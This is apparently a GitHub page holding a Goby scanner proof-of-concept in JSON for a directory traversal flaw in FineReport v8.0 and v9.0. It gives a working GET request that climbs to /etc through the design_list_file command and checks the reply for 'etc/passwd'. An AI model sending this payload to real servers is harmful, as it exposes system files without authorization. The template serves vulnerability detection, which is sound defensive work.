-
Notifications
You must be signed in to change notification settings - Fork 197
/
FineReport_Directory_traversal.json
51 lines (51 loc) · 1.96 KB
/
FineReport_Directory_traversal.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
{
"Name": "FineReport(帆软)报表系统目录遍历漏洞",
"Level": "1",
"Tags": [],
"GobyQuery": "body=\"/WebReport/ReportServer\"",
"Description": "漏洞影响\nFineReport v8.0\nFineReport v9.0",
"Product": "FineReport(帆软)报表系统",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../../../../../../../../../../../etc¤tUserName=admin¤tUserId=1&isWebReport=true",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "etc/passwd",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-06-12 22:55:02",
"GobyVersion": "1.8.268"
}